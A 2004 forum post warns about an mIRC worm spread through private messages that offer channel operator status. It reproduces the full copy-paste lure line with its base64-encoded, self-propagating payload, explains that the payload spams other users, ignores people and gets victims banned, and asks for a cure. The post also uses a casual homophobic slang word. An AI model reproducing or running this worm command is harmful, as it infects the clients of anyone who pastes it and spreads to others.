IRC Virus Thingy.


Fledgling Freddie
Oct 3, 2004
Well, you may get the odd gimp messaging you this.

Wanna be an OPERATOR in #xxxx ?
copy/paste this->7
//write . $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpvaW4gI1NleGViIHwgLm1zZyAkbmljayBXYW5uYSBiZSBhbiBPUEVSQVRPUiBpbiAkY2hhbiA/IGNvcHkvcGFzdGUgdGhpcy0+AzcgLy93cml0ZSCgLqAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAuoCAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs . | //mode $me +R

If you've any common sense then just close the priv and you won't actually copy & paste it.

What it does is, PM's other people asking them if they want to be a op in the channel your in, just some average annoying virus. But can also get you banned from alot of channels! :)

Also it adds the person that is highlighted, usually, red onto your ignore list.

Anybody know a cure for the ghey virus then posting here will be nice :D spanks :)

[PS] That isn't the exact message ^^^

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